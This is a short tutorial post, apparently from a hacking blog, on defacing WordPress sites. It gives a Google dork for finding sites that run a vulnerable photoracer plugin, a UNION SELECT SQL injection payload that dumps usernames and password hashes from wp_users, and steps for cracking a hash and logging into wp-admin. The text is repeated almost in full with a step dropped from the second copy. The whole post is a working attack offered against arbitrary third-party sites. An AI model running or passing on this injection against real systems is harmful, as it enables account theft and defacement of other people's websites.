How to deface With WordPress Exploit
How to deface With Wordpress Exploit - This time I will share how
expliot wordpress , it is already long way really, .Here's how:
1. Dork type the following into the Google search box : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
2. Later will come a few web , open one for execution .
3. Add exploits behind url: +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Example : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 into
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
4. Well , later going to appear sightings username and password from the web.
Example : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
5.There, the form of the password is still a salt / MD5 . Please crack first, to MD5 passwords can be cracked here
6. If you already can username and password, you log into the web through : www.site.com/wp-admin/
good luck
How to deface With Wordpress Exploit - This time I will share how
expliot wordpress , it is already long way really, .Here's how:
2. Later will come a few web , open one for execution .
3. Add exploits behind url: +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Example : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 into
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
4. Well , later going to appear sightings username and password from the web.
Example : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1
5.There, the form of the password is still a salt / MD5 . Please crack first, to MD5 passwords can be cracked here
6. If you already can username and password, you log into the web through : www.site.com/wp-admin/
good luck